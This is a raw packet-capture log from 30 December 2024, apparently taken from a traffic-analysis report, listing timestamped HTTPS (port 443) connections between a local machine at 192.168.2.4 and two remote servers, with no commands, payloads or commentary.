                                                                                                                                                                                    Dec 30, 2024 11:52:09.044055939 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.375817060 CET44352127142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.375977993 CET52127443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.375998020 CET44352127142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377093077 CET52127443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377093077 CET52127443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377136946 CET44352127142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377310038 CET44352127142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377363920 CET52127443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377363920 CET52127443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377814054 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.377860069 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.378133059 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.378478050 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.378492117 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463411093 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463460922 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463500977 CET52130443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463500977 CET52130443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463519096 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463588953 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463623047 CET52130443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.463623047 CET52130443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464165926 CET52130443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464184046 CET44352130142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464644909 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464679003 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464745998 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464943886 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.464953899 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.505796909 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.505888939 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.506885052 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.506954908 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.513362885 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.513381004 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.513761997 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.513823032 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.514902115 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.549997091 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.551750898 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.553515911 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.553535938 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.553754091 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.553761959 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.559323072 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880101919 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880165100 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880584002 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880635023 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880646944 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.880686998 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.881061077 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.881078005 CET44352134142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.881088018 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.881122112 CET52134443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.882047892 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.882092953 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.882622004 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.882886887 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.882898092 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959444046 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959484100 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959501028 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959508896 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959520102 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959554911 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959558964 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.959593058 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960177898 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960221052 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960282087 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960282087 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960289001 CET44352135142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960313082 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960325956 CET52135443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960791111 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960854053 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.960937023 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.964423895 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:09.964452982 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.997215033 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.997337103 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:09.997998953 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:09.998071909 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.000096083 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.000123978 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.000438929 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.000520945 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.000957966 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.043339968 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.063791990 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.063886881 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.064625025 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.064652920 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.066306114 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.066320896 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.372698069 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.372793913 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.372864962 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.372920036 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.374753952 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.374809980 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.374840021 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.374867916 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.378546953 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.378591061 CET44352139142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.378621101 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379225016 CET52139443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379342079 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379385948 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379456043 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379715919 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.379728079 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.481704950 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.481801987 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.482321978 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.482327938 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.482443094 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.482446909 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.483876944 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.483932972 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.483937979 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.483982086 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.483999968 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.484050989 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.484100103 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.484836102 CET52142443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.484853983 CET44352142142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.485881090 CET52151443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.485905886 CET44352151142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.486020088 CET52151443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.486215115 CET52151443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.486228943 CET44352151142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.572813988 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.572873116 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.586852074 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.586880922 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.587259054 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.587269068 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.845736980 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.845866919 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.845885038 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.845963001 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846237898 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846323967 CET44352145142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846554041 CET52157443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846573114 CET52145443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846613884 CET44352157142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846684933 CET52157443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846926928 CET52157443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:10.846944094 CET44352157142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995699883 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995776892 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995791912 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995822906 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995883942 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995892048 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995937109 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.995990992 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.998333931 CET52146443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.998353004 CET44352146142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999105930 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999151945 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999330044 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999943972 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999965906 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:10.999980927 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.000010967 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.000401974 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.000406981 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.002166986 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.002172947 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.009032011 CET52151443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.009058952 CET52157443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.012218952 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.012252092 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.012335062 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.012696981 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.012712002 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.375284910 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.375410080 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.375420094 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.375457048 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.376254082 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.376311064 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.376549959 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.377645016 CET52150443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.377655029 CET44352150142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378154039 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378176928 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378355026 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378429890 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378448963 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378557920 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378936052 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.378945112 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.379677057 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.379687071 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.603046894 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.603913069 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.605653048 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.605667114 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.605818987 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.605824947 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.621998072 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.622066975 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.622775078 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.622915030 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.625432968 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.625444889 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.625684023 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.625821114 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.626182079 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.671330929 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.978492975 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.978580952 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.979249001 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.979295015 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.982443094 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.982475996 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.982764006 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.982996941 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.983222008 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:11.987601995 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.987747908 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.991352081 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.991365910 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.991719961 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:11.991801977 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:11.992512941 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.001909018 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.001983881 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.001997948 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.002068043 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.002294064 CET52160443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.002336025 CET44352160142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.003134012 CET52170443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.003179073 CET44352170142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.003247023 CET52170443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.003489971 CET52170443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.003508091 CET44352170142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008718967 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008779049 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008805037 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008819103 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008831024 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008853912 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008862019 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008877039 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.008928061 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.011112928 CET52159443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.011132956 CET44352159142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.011804104 CET52172443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.011843920 CET44352172142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.012687922 CET52172443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.013140917 CET52172443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.013154984 CET44352172142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.023330927 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.039326906 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346071005 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346155882 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346195936 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346232891 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346396923 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346424103 CET44352164142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346457005 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.346477032 CET52164443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.347309113 CET52179443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.347340107 CET44352179142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.347449064 CET52179443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.347872019 CET52179443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:12.347882986 CET44352179142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395724058 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395776987 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395909071 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395909071 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395920038 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.395989895 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.396292925 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.396292925 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.396821976 CET52163443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.396833897 CET44352163142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.397300959 CET52180443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.397326946 CET44352180142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:12.397394896 CET52180443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.397629976 CET52180443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:12.397641897 CET44352180142.250.185.193192.168.2.4
